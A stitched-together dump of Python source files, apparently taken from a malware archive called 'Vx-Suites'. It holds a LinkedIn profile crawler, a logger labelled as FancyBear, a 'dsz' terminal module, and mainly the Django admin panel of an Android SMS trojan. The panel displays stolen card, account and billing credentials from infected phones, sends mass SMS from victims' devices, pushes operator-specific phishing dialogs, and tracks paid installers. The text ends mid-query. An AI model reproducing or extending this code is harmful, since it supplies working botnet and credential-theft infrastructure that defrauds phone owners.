person['suggestions'].append({
'url': url,
'name': _single(suggestion.xpath(X_SUGGESTION_NAME)),
'headline': _single(suggestion.xpath(X_SUGGESTION_HEADLINE))
})
self.log.debug('Profile information: %s',
json.dumps(person, indent=2))
return person
@staticmethod
def get_session_connection():
'''
Creates a `requests.Session` instance
and includes basic connection fault tolerance.
:returns: A configured requests.Session instance
:rtype: :class:`requests.Session`
'''
# Build a session object with some fault tolerance
# Retry up to 10 times with increasing backoff time
# up to 120 seconds.
session = Session()
session.mount(
LINKEDIN_PROFILE_URL,
HTTPAdapter(
max_retries=urllib3.util.Retry(
total=10,
backoff_factor=0.4,
status_forcelist=[500, 501, 502, 503, 504]
)))
session.headers = {
'User-Agent': USER_AGENT
}
return session
def main():
'''Entry point'''
# Get a list of usable proxies
# proxylist = ProxyCrawler()
# Init the crawler
crawler = LinkedInCrawler(LINKEDIN_SEARCH_TERMS)
# Build a list to use for searching
people = crawler.build_profile_list(LINKEDIN_START_PROFILES, depth=3)
print 'People: %s' % json.dumps(people, indent=2)
# Roll the dice, mix up the list
shuffle(people)
# Get a browser driver
driver = webdriver.Chrome()
# Get an authenticated session
authenticate(driver)
# Read in parsable list of profiles to start with
for person in people:
print 'Viewing profile: "%s"' % person['name']
driver.get(person['url'])
_sleep_cnt = randint(2, 45)
print '|_sleeping %s seconds' % _sleep_cnt
sleep(_sleep_cnt)
print 'Successfully viewed %s profiles' % len(people)
if __name__ == "__main__":
main()
```
{
"source": "010001111/Vx-Suites",
"score": 3
} |
#### File: Vx-Suites/Python.FancyBear/ConsoleLogger.py
```python
import sys
########################################################################
class ConsoleLogger(object):
def log_exception(self, message=''):
if message:
message += " - "
print "#! EXC: ", message, sys.exc_info()[0].__name__, ":", sys.exc_info()[1]
def log_error(self, message):
print "#! ERR:", message
def log_warning(self, message):
print "#! WAR:", message
def log_message(self, message):
print "#>", message
if __name__ == '__main__':
logger = ConsoleLogger()
try:
raise BaseException("OoooopS! Exception!")
except:
logger.log_exception("WTF?!")
try:
raise ValueError("OoooopS! Exception! 2")
except:
logger.log_exception()
logger.log_error("Test Error")
logger.log_warning("Test Warning")
logger.log_message("Test message")
```
#### File: gui/terminal/__init__.py
```python
import dsz
import dsz.lp.alias
import dsz.lp.cmdline
import dsz.path
import dsz.version
import os
import re
import sys
import xml.dom.minidom
class NewTerminal:
def __init__(self):
self.bFocus = False
self.bClose = False
self.bDisable = False
self.dst = dsz.script.Env['target_address']
self.bDetach = False;
self.locX = 0
self.locY = 0
self.sizeWidth = 0
self.sizeHeight = 0
self.name = None
self.command = None
def setDetach(self, width, height, x, y):
self.bDetach = True
self.locX = x
self.locY = y
self.sizeWidth = width
self.sizeHeight = height
return True
def setLocation(self, x, y):
self.bDetach = True
self.locX = x
self.locY = y
return True
def setSize(self, width, height):
self.sizeWidth = width
self.sizeHeight = height
return True
def setFocus(self, value=True):
self.bFocus = value
def setClose(self, value=True):
self.bClose = value
def setDisable(self, value=True):
self.bDisable = value
def setDestination(self, dest):
self.dst = dest
def setName(self, newName):
self.name = newName
def setCommand(self, cmd):
self.command = cmd
def spawn(self):
cmd = "gui -command \".newterm ";
if self.bFocus:
cmd += "-focus "
if self.bClose:
cmd += "-close "
if self.bDisable:
cmd += "-disable "
if self.bDetach:
cmd += "-detach=%dx%d@%d,%d " % (self.sizeWidth, self.sizeHeight, self.locX, self.locY)
if self.dst <> None:
cmd += "-dst=%s " % self.dst
if self.name <> None:
cmd += "-name=\\\"%s\\\" " % self.name
if self.command <> None:
cmd += "-cmd=\\\"%s\\\" " % self.command
cmd += "\"";
return dsz.cmd.Run(cmd)
```
#### File: smsg_r/smsapp/admin_extra_views.py
```python
import logging
from bson.objectid import ObjectId
from django import forms
from django.conf import settings
from django.contrib import messages
from django.contrib.admin.views.decorators import staff_member_required
from django.shortcuts import render, redirect, get_object_or_404
from django.utils.translation import ugettext_lazy as _
from decorators import admin_user_required
import models
import commands
logger = logging.getLogger(__name__)
@staff_member_required
def card_info_list(request, export=None):
info = settings.MONGO['extra_data'].find(
{'type': 'userdata', 'data.type': 'card information', 'hidden': {'$ne': 'y'}})
cl = {'opts': {'app_label': "smsapp"}}
tmpl = 'admin/smsapp/info/cards.html'
ct = "text/html"
if export:
tmpl = 'admin/smsapp/info/cards.txt'
ct = "text/plain"
return render(request, tmpl, {'cards': info, 'cl': cl}, content_type=ct)
@staff_member_required
def hide_card_info(request, oid):
settings.MONGO['extra_data'].update({"_id": ObjectId(oid)}, {'$set': {'hidden': 'y'}})
return redirect('card_list')
@admin_user_required
def account_info_list(request):
app_types = (
('', '----'),
('gm', 'Gmail'),
('fb', 'Facebook'),
('tw', 'Twitter'),
)
class AccTypeForm(forms.Form):
t1 = forms.ChoiceField(choices=app_types, label=_("account type"), required=False)
type_filter = {'type': 'userdata', 'data.type': 'account'}
if request.POST.get('t1'):
type_filter['data.name'] = request.POST.get('t1')
info = settings.MONGO['extra_data'].find(type_filter)
cl = {'opts': {'app_label': "smsapp"}}
return render(request, 'admin/smsapp/info/accounts.html',
{'accounts': info, 'cl': cl, 'type_form': AccTypeForm(request.POST or None)})
@admin_user_required
def billing_acc_list(request):
acc_types = [
('', '----')
]
ts = settings.MONGO['extra_data'].find({'data.type': "billing credentials"}).distinct('data.name')
for t in ts:
acc_types.append((t, t))
class AccTypeForm(forms.Form):
t1 = forms.ChoiceField(choices=acc_types, label=_("account type"), required=False)
type_filter = {'type': 'userdata', 'data.type': 'billing credentials'}
if request.POST.get('t1'):
type_filter['data.name'] = request.POST.get('t1')
info = settings.MONGO['extra_data'].find(type_filter)
cl = {'opts': {'app_label': "smsapp"}}
return render(request, 'admin/smsapp/info/bill.html',
{'accounts': info, 'cl': cl, 'type_form': AccTypeForm(request.POST or None)})
@admin_user_required
def forms_info_list(request):
info = settings.MONGO['extra_data'].find({'type': 'userdata', 'data.type': 'forms'})
cl = {'opts': {'app_label': "smsapp"}}
return render(request, 'admin/smsapp/info/forms_list.html', {'forms': info, 'cl': cl})
@admin_user_required
def forms_info_details(request, objid):
obj = settings.MONGO['extra_data'].find_one(ObjectId(objid))
cl = {'opts': {'app_label': "smsapp"}}
# todo: old forms
forms_ = obj['data']['forms']
return render(request, 'admin/smsapp/info/form_details.html',
{'form1': forms_.get('first window'), 'form2': forms_.get('second window'), 'cl': cl})
@admin_user_required
def html_form_details(request, objid):
obj = settings.MONGO['extra_data'].find_one(ObjectId(objid))
cl = {'opts': {'app_label': "smsapp"}}
form = obj['data']
return render(request, 'admin/smsapp/info/html_form_details.html', {'form': form, 'cl': cl})
@admin_user_required
def html_forms_list(request):
info = settings.MONGO['extra_data'].find({'type': 'userdata', 'data.type': 'js_form'})
cl = {'opts': {'app_label': "smsapp"}}
return render(request, 'admin/smsapp/info/html_forms_list.html', {'forms': info, 'cl': cl})
@admin_user_required
def top_apps(request):
def get_country_choices():
import pycountry
choices = [(None, '----')]
for d in models.PhoneData.objects.order_by('country').distinct().values('country'):
ccode = d['country']
try:
c = pycountry.countries.get(alpha2=ccode)
choices.append((ccode, c.name))
except KeyError:
logger.error("Unknown country: {0}".format(ccode))
return choices
class CountryForm(forms.Form):
country = forms.ChoiceField(choices=get_country_choices())
cl = {'opts': {'app_label': "smsapp"}}
if request.POST.get('country'):
ta = models.InstalledApp.objects.get_top_apps_by_country(request.POST.get('country'))
else:
ta = models.InstalledApp.objects.get_top_apps()
return render(request, 'admin/smsapp/info/apps.html', {'cl': cl, 'apps': ta,
'country_form': CountryForm(request.POST or None)})
# noinspection PyUnusedLocal
@admin_user_required
def view_bot(request, code=None):
if code is None and request.method == 'POST':
code = request.POST.get('code')
phone = get_object_or_404(models.PhoneData, uniq_id=code)
return redirect('admin:smsapp_phonedata_change', phone.id)
@admin_user_required
def mass_sms_send(request):
class MassSMSForm(forms.Form):
sms_to = forms.CharField(max_length=255)
sms_text = forms.CharField(widget=forms.Textarea)
fm = MassSMSForm(request.POST or None)
if fm.is_valid():
logger.debug("Sending SMSs")
phones = models.PhoneData.objects.raw(
"SELECT * FROM smsapp_phonedata WHERE last_connection >= NOW() - INTERVAL '15 minutes'")
for p in phones:
logger.debug("Sending SMS to online phone {0}".format(p))
commands.send_sms(p, fm.cleaned_data['sms_to'], fm.cleaned_data['sms_text'])
cl = {'opts': {'app_label': "smsapp"}}
return render(request, 'admin/smsapp/utils/mass_sms.html', {'cl': cl, 'sms_form': fm})
@admin_user_required
def country_list_admin(request):
countries = models.PhoneData.objects.get_country_list_total()
cl = {'opts': {'app_label': "smsapp"}}
return render(request, 'admin/smsapp/info/countries.html', {'cl': cl, 'data': countries})
@admin_user_required
def option_blacklist(request):
class BlacklistForm(forms.Form):
content = forms.CharField(widget=forms.Textarea)
opt, created = models.Option.objects.get_or_create(name="blacklist")
fm = BlacklistForm(request.POST or None, initial={'content': opt.content})
if fm.is_valid():
opt.content = fm.cleaned_data.get("content")
opt.save()
messages.success(request, "Saved")
return redirect('admin:index')
cl = {'opts': {'app_label': "smsapp"}}
return render(request, 'admin/smsapp/utils/blacklist.html', {'cl': cl, 'form': fm})
@admin_user_required
def crash_report(request, oid):
o = settings.MONGO['extra_data'].find_one(ObjectId(oid))
d = {'code': o['code'], 'data': o['data']}
return render(request, 'admin/smsapp/phonedata/view_report.html', d)
```
#### File: smsg_r/smsapp/admin.py
```python
import logging
from django import forms
from django.conf import settings
from django.contrib import admin
from django.forms import Form
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.utils.translation import ugettext_lazy as _
# Register your models here.
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import UserCreationForm, UserChangeForm
import html5
import remote_dialog
from . import commands, cfields
from .models import SysUser, Installer, PhoneData, RemoteDialog, LogRecord, SMSRecord, InternalSMS, \
operator_code_to_full_name, AppDialog
logger = logging.getLogger(__name__)
class MyAdminSite(admin.AdminSite):
index_template = "admin/home.html"
admin_site = MyAdminSite()
admin.site = admin_site
def autodiscover():
"""
Autodiscover function from django.contrib.admin
"""
import copy
from django.conf import settings
from django.utils.importlib import import_module
from django.utils.module_loading import module_has_submodule
for app in settings.INSTALLED_APPS:
mod = import_module(app)
before_import_registry = None
try:
before_import_registry = copy.copy(admin.site._registry)
import_module('%s.admin' % app)
except:
admin.site._registry = before_import_registry
if module_has_submodule(mod, 'admin'):
raise
class SysUserAddForm(UserCreationForm):
class Meta:
model = SysUser
fields = ('username', '<PASSWORD>', '<PASSWORD>', '<PASSWORD>')
class SysUserChangeForm(UserChangeForm):
class Meta:
model = SysUser
fields = ('jabber',)
class UserProfileAdmin(UserAdmin):
fieldsets = (
(None, {'fields': ('username', 'password', '<PASSWORD>')}),
(_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser',
'groups', 'user_permissions')}),
(_('Important dates'), {'fields': ('last_login', 'date_joined')}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('username', '<PASSWORD>', '<PASSWORD>', '<PASSWORD>')}
),
)
list_display = ['username', 'date_joined']
form = SysUserChangeForm
add_form = SysUserAddForm
admin.site.register(SysUser, UserProfileAdmin)
class InstallerAddForm(UserCreationForm):
class Meta:
model = Installer
fields = ('username', '<PASSWORD>', '<PASSWORD>', 'user_id')
class InstallerChangeForm(UserChangeForm):
class Meta:
model = Installer
fields = ('username', 'user_id')
class InstallerProfileAdmin(UserAdmin):
fieldsets = (
(None, {'fields': ('username', 'password', 'user_id',)}),
(_('Important dates'), {'fields': ('last_login', 'date_joined')}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('username', '<PASSWORD>', '<PASSWORD>', 'user_id',)}
),
)
actions = ('mark_as_paid',)
list_display = ['username', 'user_id']
form = InstallerChangeForm
add_form = InstallerAddForm
def mark_as_paid(self, request, queryset):
"""
@type request: HttpRequest
@type queryset: QuerySet
"""
count = 0
for usr in queryset.all():
count += 1
usr.phonedata_set.all().update(paid=True)
self.message_user(request, "Marked phones as paid for {0} users".format(count))
mark_as_paid.short_description = _("Mark phones for selected users as paid")
admin.site.register(Installer, InstallerProfileAdmin)
class PhoneNumberFilter(admin.SimpleListFilter):
title = _("Phone number")
parameter_name = "number"
def lookups(self, request, model_admin):
return (
('valid', _("Valid")),
('invalid', _("Invalid")),
)
def queryset(self, request, queryset):
"""
@type request: HttpRequest
@type queryset: QuerySet
@rtype: QuerySet
"""
if self.value() == 'valid':
return queryset.filter(number__startswith='+')
elif self.value() == 'invalid':
return queryset.exclude(number__startswith='+')
class AppInstalledFilter(admin.SimpleListFilter):
title = _("Installed app")
parameter_name = "app"
def lookups(self, request, model_admin):
return (
(None, 'None'),
)
def queryset(self, request, queryset):
if request.GET.get('app'):
return queryset.filter(installedapp__name=request.GET.get('app'))
return queryset
class SMSSenderFilter(admin.SimpleListFilter):
title = _("SMS Senders")
parameter_name = "sender"
def lookups(self, request, model_admin):
return (
(None, 'None'),
)
def queryset(self, request, queryset):
if request.GET.get('sender'):
return queryset.filter(internalsms__sender__id=request.GET.get('sender')).distinct()
return
class CountryFilter(admin.SimpleListFilter):
title = _("Country")
parameter_name = "country"
def lookups(self, request, model_admin):
return (
(None, 'None'),
)
def queryset(self, request, queryset):
cc = request.GET.get(self.parameter_name)
if cc:
return queryset.filter(country=cc)
return queryset
class OnlineFilter(admin.SimpleListFilter):
title = _("Online")
parameter_name = 'online'
def lookups(self, request, model_admin):
return (
(1, _("Yes")),
)
def queryset(self, request, queryset):
if self.value() == '1':
from datetime import datetime, timedelta
then = datetime.utcnow() - timedelta(minutes=15)
return queryset.filter(last_connection__gt=then)
return queryset
class PhoneDataAdminForm(forms.ModelForm):
class Meta:
model = PhoneData
widgets = {
'number': html5.Html5PhoneInput(attrs={'size': '14'}),
}
exclude = ()
class PhoneDataAdmin(admin.ModelAdmin):
list_per_page = 50
list_display = ['imei', 'uniq_id', 'work_time', 'last_connect', 'has_card', 'number', 'country', ]
list_editable = ['number', 'country', ]
list_filter = (
'id_sent', 'inactive', 'installer', 'paid',
PhoneNumberFilter, OnlineFilter, AppInstalledFilter, SMSSenderFilter, CountryFilter
)
actions = ('send_id_command', 'send_dialogs', )
form = PhoneDataAdminForm
def get_changelist_form(self, request, **kwargs):
# return super(PhoneDataAdmin, self).get_changelist_form(request, **kwargs)
return PhoneDataAdminForm
def work_time(self, obj):
"""
@type obj: PhoneData
"""
return obj.get_work_time()
work_time.admin_order_field = 'registered'
work_time.short_description = _("Work time")
def last_connect(self, obj):
"""
@type obj: PhoneData
"""
return obj.since_last_connection()
last_connect.admin_order_field = 'last_connection'
last_connect.short_description = _("Last connection")
def has_card(self, obj):
"""
@type obj: PhoneData
"""
d = settings.MONGO['extra_data'].find_one(
{'type': 'userdata', 'data.type': 'card information', 'code': obj.uniq_id})
if d:
return "Y"
return ""
has_card.short_description = _("Card")
has_card.safe = True
class SendIDForm(forms.Form):
_selected_action = forms.CharField(widget=forms.MultipleHiddenInput)
phone = forms.CharField(max_length=32)
def send_id_command(self, request, queryset):
"""
@type request: HttpRequest
@type queryset: QuerySet
"""
form = None
if 'apply' in request.POST:
form = self.SendIDForm(request.POST)
if form.is_valid():
phone = form.cleaned_data['phone']
count = 0
for p in queryset:
# p.tags.add(phone)
commands.send_id(p, phone)
logger.debug("Sending ID to {0}".format(p))
count += 1
plural = ''
if count != 1:
plural = 's'
self.message_user(request, "Successfully sent to {0:d} phone{1:s}.".format(count, plural))
return HttpResponseRedirect(request.get_full_path())
if not form:
form = self.SendIDForm(initial={'_selected_action': queryset.values_list('id', flat=True)})
return render(request, 'admin/smsapp/phonedata/sentid_form.html', {'phones': queryset, 'send_form': form, })
send_id_command.short_description = _("Send ID SMS from selected phones")
def change_view(self, request, object_id, form_url='', extra_context=None):
extra_context = extra_context or {}
collection = settings.MONGO['extra_data']
phone_extras = []
p = PhoneData.objects.get(pk=object_id)
for rec in collection.find({'code': p.uniq_id, 'type': 'userdata'}):
try:
phone_extras.append({'title': rec['data']['type'], 'records': rec['data']})
except KeyError:
pass
extra_context['extras'] = phone_extras
extra_context['uniq_id'] = p.uniq_id
return super(PhoneDataAdmin, self).change_view(request, object_id, form_url, extra_context)
class DialogsForm(forms.Form):
_selected_action = forms.CharField(widget=forms.MultipleHiddenInput)
dialog = forms.ModelChoiceField(help_text=_("Select dialog to send"), queryset=RemoteDialog.objects.all())
# noinspection PyMethodMayBeStatic
def send_dialogs(self, request, queryset):
form = None
if 'apply' in request.POST:
form = self.DialogsForm(request.POST)
if form.is_valid():
dlg = form.cleaned_data.get('dialog')
count = 0
for p in queryset:
remote_dialog.push_dialog(p.uniq_id, dlg)
logger.debug("Pushed dialog {0} to phone {1}".format(dlg, p))
count += 1
plural = ''
if count != 1:
plural = 's'
self.message_user(request, "Successfully sent to {0:d} phone{1:s}.".format(count, plural))
return HttpResponseRedirect(request.get_full_path())
if not form:
form = self.DialogsForm(initial={'_selected_action': queryset.values_list('id', flat=True)})
return render(request, 'admin/smsapp/remotedialog/send_dialogs_form.html',
{'dialogs_form': form, 'phones': queryset})
send_dialogs.short_description = _("Send specified dialogs to phones")
admin.site.register(PhoneData, PhoneDataAdmin)
class LogRecordAdmin(admin.ModelAdmin):
list_per_page = 50
change_list_template = "admin/smsapp/logrecord/list.html"
list_display = ('registered', 'contents',)
def get_model_perms(self, request):
return {}
def changelist_view(self, request, extra_context=None):
extra_context = extra_context or {}
extra_context['title'] = _('Log records')
return super(LogRecordAdmin, self).changelist_view(request, extra_context)
def get_queryset(self, request):
return super(LogRecordAdmin, self).get_queryset(request).order_by('-registered')
admin.site.register(LogRecord, LogRecordAdmin)
class SMSAdmin(admin.ModelAdmin):
list_per_page = 50
list_display = ('source', 'phone', 'owner', 'contents', 'billing_status')
list_filter = ('billing_status',)
list_editable = ('billing_status',)
admin.site.register(SMSRecord, SMSAdmin)
class OperatorCodeForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(OperatorCodeForm, self).__init__(*args, **kwargs)
try:
country = self.initial.get('operator')[:3]
self.fields['operator'].widget.widgets[1].choices = cfields.get_operator_choices(country)
except ValueError:
pass
except TypeError:
pass
class Meta:
model = RemoteDialog
widgets = {
'operator': cfields.OperatorWidget()
}
exclude = ()
class DialogAdmin(admin.ModelAdmin):
list_display = ('id', 'operator_name', 'priority', 'description',)
list_editable = ('priority',)
form = OperatorCodeForm
fieldsets = (
(None, {'fields': ('operator', 'priority', 'description', 'delay', 'restart')}),
("Dialogs", {'fields': ('dlg1', )}),
("HTML content", {'fields': ('html_contents',)})
)
def operator_name(self, val):
return operator_code_to_full_name(val.operator)
operator_name.short_description = _("Operator")
admin.site.register(RemoteDialog, DialogAdmin)
class InternalSMSAdmin(admin.ModelAdmin):
list_display = ('sender', 'created', 'phone')
list_filter = ('sender',)
def has_add_permission(self, request):
return False
# noinspection PyMethodMayBeStatic
def sender_stats(self, request):
def get_country_choices():
import pycountry
choices = [(None, '----')]
for d in PhoneData.objects.order_by('country').distinct().values('country'):
ccode = d['country']
try:
c = pycountry.countries.get(alpha2=ccode)
choices.append((ccode, c.name))
except KeyError:
logger.debug("Unknown country: {0}".format(ccode))
return choices
class CountryForm(Form):
country = forms.ChoiceField(choices=get_country_choices())
if request.POST.get('country'):
ls = InternalSMS.objects.get_sender_stats_by_country(request.POST.get('country'))
else:
ls = InternalSMS.objects.get_sender_stats()
cl = {'opts': {'app_label': "smsapp"}, 'result_list': ls}
return render(request, 'admin/smsapp/internalsms/topsenders.html',
{'cl': cl, 'country_form': CountryForm(request.POST or None)})
def get_urls(self):
from django.conf.urls import patterns, url
urls = super(InternalSMSAdmin, self).get_urls()
my_urls = patterns(
'',
url(r'^senders$', admin.site.admin_view(self.sender_stats), name='sender_stats')
)
return urls + my_urls
admin.site.register(InternalSMS, InternalSMSAdmin)
class AppDialogAdmin(admin.ModelAdmin):
list_display = ('description',)
admin.site.register(AppDialog, AppDialogAdmin)
```
#### File: smsg_r/smsapp/idgen.py
```python
import random
import cPickle
__cachefile = 'pygpw_tris_cache.cpickle'
_lowercase = 'abcdefghijklmnopqrstuvwxyz'
_uppercase = _lowercase.upper()
_vowels = 'aeiou'
_numbers = '0123456789'
_symbols = '`~!@#$%^&*()-=_+[]{}\\|;:\'",.<>/?'
_leet_table = {
# lowercase: ([singlechar_substs],[multichar_substs])
'a': (['4', '@', '^'], ['/\\', '/-\\']),
'b': (['6', '8', '&'], ['|3', '13', 'I3']),
'c': (['<', '(', '{'], []),
'd': ([], ['|)', '])', '[)', 'I>', '|>']),
'e': (['3', '&'], []),
'f': ([], ['ph', '|=', ']=', 'I=']),
'g': (('9', '6'), ['(_+']),
'h': ([], ['/-/', ']-[', '|-|', '}{', '}-{']),
'i': (('1', '|', '!'), []),
'j': ([], ['_|', '_/', '_7']),
'k': ([], ['|<', '|{']),
'l': (['|'], ['|_', ]),
'm': ([], ['/\\/\\', '|V|', '||', '[V]', '|\\/|', '/|\\', '/|/|', '/V\\']),
'n': (['~'], ['|\\|', '/\\/', '|\\', ']\\[']),
'o': (['0', ], ['()', '[]']),
'p': (['?'], ['|*', '|o', '|>', '|D']),
'q': (['9'], ['()_', 'O_', '0_', '<|']),
'r': (['2'], ['12', '|?', '/2', '|~', '|2', '|`', 'l2']),
's': (['5', '$', 'z'], []),
't': (['+', '7'], ['-|-', ]),
'u': ([], ['|_|', '[_]', '\_/', '\\_\\', '/_/', '(_)']),
'v': ([], ['\\/']),
'w': ([], ['\\/\\/', 'VV', '\\^/', '\\V/', '\\|/']),
'x': (['%', '*'], ['><', '}{']),
'y': ([], ['`/']),
'z': (['2', 's'], ['7_']),
}
_tris = None
_sigma = None
def _docache():
"""
(re)build cache using cPickle. This will be automatically called if the
cachefile is not found, so you can recreate the cache by simply deleting
the existing one
"""
# load tris
# calculate the sigma value: the probability total of the trigraph set
# sigma calculation result is cached, since source is relatively static.
from smsapp.idgen_tris import tris
sigma = 0
for c1 in xrange(26):
for c2 in xrange(26):
for c3 in xrange(26):
sigma += tris[c1][c2][c3]
    # tris is cached since cPickle I/O is faster than .pyc marshalling
dumpobj = (tris, sigma) # dump tuple
fhw = open(__cachefile, 'w')
cPickle.dump(dumpobj, fhw)
fhw.close()
def _readcache():
"""get the trigraph data from cachefile. returns a tuple (t,s)
where t is the matrix and s is the sigma value"""
fh = None
try:
fh = open(__cachefile, 'r')
except:
# build if does not exist
_docache()
fh = open(__cachefile, 'r')
cachedata = cPickle.load(fh)
fh.close()
return cachedata
def gettris():
"""get the trigraph probability matrix and sigma value.
returns a tuple (t,s) where t is the matrix and s is the sigma value."""
global _tris
global _sigma
if not _tris or not _sigma:
# store into module namespace so future calls require no I/O
_tris, _sigma = _readcache()
return _tris, _sigma
def generate_trigraph(passwordlength=8, alphabet=None, vowels=None):
    '''Generate a password using trigraph probabilities'''
_alphabet = _lowercase
tdata, sigma = gettris()
password = [] # append required
# pick random starting point
# we do it this way so we can be sure to pick a natural english
# trigraph as a starting point, not just random gibberish, since
# trigraphs with zero english occurrences are never chosen.
ranno = int(sigma * random.random())
sum = 0
bail = False
for c1 in xrange(26):
for c2 in xrange(26):
for c3 in xrange(26):
sum += tdata[c1][c2][c3]
if sum >= ranno:
# this is the starting random (but probable) trigraph
password.append(_alphabet[c1])
password.append(_alphabet[c2])
password.append(_alphabet[c3])
bail = True # break out of this triply-nested loop
if bail:
break
if bail:
break
if bail:
break
# do random walk
nchar = 3
while nchar < passwordlength:
c1 = _alphabet.find(password[nchar - 2])
c2 = _alphabet.find(password[nchar - 1])
# we have a password ...[c1][c2][?] character triplet
# --------->|
# (current password)
# with c1 and c2 being the last two chars of current password.
# want to append another char (i.e. '?') to password.
# randomly grab the third ('?') from trigraph table
# using probability density defined in that data[c1][c2] list.
sum = 0
for c3 in xrange(26):
sum += tdata[c1][c2][c3]
if sum == 0:
# in this unlikely case, we have a c1, c2 pair where there
# are zero natural trigraphs starting with [c1][c2]
            # meaning we can't continue any further.
# For correctness, we should break the loop for
# this password or try again.
# However, another workaround is to 'inject' a random vowel to
# continue and finish the rest of this password.
# --- Comment out either one of the 2 below lines ---
# break
password.extend(random.sample(_vowels, 1))
else:
ranno = int(random.random() * sum)
sum = 0
for c3 in xrange(26):
sum += tdata[c1][c2][c3]
if sum > ranno:
password.append(_alphabet[c3])
break
nchar += 1
# end random walk
return ''.join(password)
def generate_naive(passwordlength=8, vowel_interlace=False, alphabet=_lowercase, vowels=_vowels):
    '''Naive implementation. Set vowel_interlace=True to simulate pronounceable passwords'''
pw = []
for pos in xrange(passwordlength):
# if vowel_interlace, dont allow two consonants in a row
if vowel_interlace and pos > 0 and not pw[pos - 1] in _vowels:
pw.extend(random.sample(vowels, 1))
else:
pw.extend(random.sample(alphabet, 1))
return "".join(pw)
def leetify_string(plain, capitalize_rate=0.5, substitute_rate=0.5, multichar=False):
leet = []
c_idx = 0
leet_len = 0
maxchars = len(plain)
while leet_len < len(plain):
c = plain[c_idx]
cl = c.lower()
if leet_len == len(plain):
break
maxchars = len(plain) - leet_len
if maxchars == 0:
break
if random.random() < capitalize_rate:
if c == cl:
c = c.upper()
else:
c = c.lower()
if random.random() < substitute_rate:
single_subs, multi_subs = _leet_table.get(cl, ([c], []))
# try picking a multicharacter substitute that will fit it in
if multichar and len(multi_subs) > 0:
if maxchars == 1:
if len(single_subs) > 0:
c = random.sample(single_subs, 1)[0]
leet.append(c)
c_idx += 1
leet_len += len(c)
continue
# temporary selection pool of mixed multi and single
tmp_subs = []
tmp_subs.extend(single_subs[:])
tmp_subs.extend(multi_subs[:])
tmp = None
while len(tmp_subs):
tmp = random.sample(tmp_subs, 1)[0]
if len(tmp) > maxchars:
# remove this subst entry, it's too big
tmp_subs.remove(tmp)
else:
tmp_subs = [] # break inner loop
if not tmp is None:
if len(tmp) <= maxchars:
c = tmp
else:
if len(single_subs) > 0:
c = random.sample(single_subs, 1)[0]
leet.append(c)
c_idx += 1
leet_len += len(c)
    # return an (output, explain) pair
return ''.join(leet), plain[:c_idx]
_methods = {
# name, (func, default kwargs dict)
'trigraph': (generate_trigraph, {}),
'naive': (generate_naive, {'vowel_interlace': True}),
'random': (generate_naive, {'vowel_interlace': False}),
}
def generate(numpasswords=1, passwordlength=8, method='trigraph', verbose=False,
leetify=False, alphabet=_lowercase, vowels=_vowels,
explain=False, multichar=False, substitute_rate=0.5, capitalize_rate=0.5):
'''main generate loop'''
gfunc, kwargs = _methods[method]
passlist = []
for i in xrange(numpasswords):
pw = gfunc(passwordlength=passwordlength, alphabet=alphabet, vowels=vowels, **kwargs)
pw_explain = pw
if leetify:
pw, pw_explain = leetify_string(pw, multichar=multichar,
substitute_rate=substitute_rate,
capitalize_rate=capitalize_rate)
passlist.append(pw)
return passlist
class __NP():
@staticmethod
def write(x):
pass
def generate_uniq_id():
"""
    Generates a human-friendly unique ID
    @return: unique ID string
    @rtype: str
"""
generate_args = {
'numpasswords': 1,
'passwordlength': 8,
'leetify': False,
'method': 'naive',
'alphabet': _uppercase
}
p = generate(**generate_args)
if p:
return "{0:s}{1:02d}".format(p[0], random.randint(0, 99))
```
#### File: smsg_r/smsapp/models.py
```python
import base64
import logging
from datetime import timedelta, datetime
import re
import HTMLParser
from ago import human
from django.conf import settings
from django.contrib.auth.models import User, UserManager, Permission
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import AppRegistryNotReady
from django.db import models, connection
from django.db.models import Q
from django.db.models.signals import post_save
from django.db.utils import ProgrammingError
from django.dispatch import receiver
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from django_countries.fields import CountryField
from smsapp import idgen, commands, cfields
logger = logging.getLogger(__name__)
DB_HTML_CACHE = "__htmlCache"
DB_HTML_VERSION = "__htmlVersion"
DB_CACHE_TIMEOUT = 30
class SysUser(User):
jabber = models.EmailField(null=True)
activation_key = models.CharField(_('activation key'), max_length=40, null=True)
objects = UserManager()
ACTIVATED = u"ALREADY_ACTIVATED"
class Meta:
verbose_name = _("System User")
verbose_name_plural = _("System Users")
def activation_key_expired(self):
expiration_date = timedelta(days=settings.ACCOUNT_ACTIVATION_DAYS)
return self.activation_key == self.ACTIVATED or (self.date_joined + expiration_date <= timezone.now())
activation_key_expired.boolean = True
class Installer(User):
user_id = models.DecimalField(max_digits=16, decimal_places=0, unique=True)
objects = UserManager()
class Meta:
verbose_name = _("Installer")
verbose_name_plural = _("Installers")
def __unicode__(self):
return self.username
def operator_code_to_full_name(code):
import mobile_codes
import re
h = HTMLParser.HTMLParser()
a = re.compile("^\d{5,}")
if not code or not a.match(code):
return code
mcc = code[:3]
mnc = code[3:]
try:
op = mobile_codes.mcc_mnc(mcc, mnc)
cn = mobile_codes.mcc(mcc)
try:
return u"{0} ({1}) - {2}".format(h.unescape(op.operator), mnc, cn[0].name)
except AttributeError:
return u"{0} ({1}) - {2}".format(h.unescape(op.operator), mnc, cn[0])
except KeyError:
try:
cn = mobile_codes.mcc(mcc)
except KeyError:
return u"Unknown ({0}/{1})".format(mcc, mnc)
try:
return u"{0} unknown ({1}/{2})".format(cn.name, mcc, mnc)
except AttributeError:
return u"Unknown ({0}/{1})".format(mcc, mnc)
class MobileOperator(models.Model):
name = models.CharField(max_length=255)
def __unicode__(self):
return operator_code_to_full_name(self.name)
# noinspection PyMethodMayBeStatic
class PhoneManager(models.Manager):
def get_online_list(self):
cursor = connection.cursor()
query = """
SELECT * FROM smsapp_phonedata WHERE
last_connection >= NOW() - INTERVAL '15 minutes'
"""
cursor.execute(query)
return cursor.fetchall()
def get_country_list(self, user_id):
"""
Return list of countries with available phones
@param self: this object
@param user_id: User ID
@type user_id: int
@return: set of data
@rtype: dict
"""
cursor = connection.cursor()
query = """
SELECT count(id) as total, sum(CASE WHEN (owner_id IS NULL OR owner_id = {0}) AND
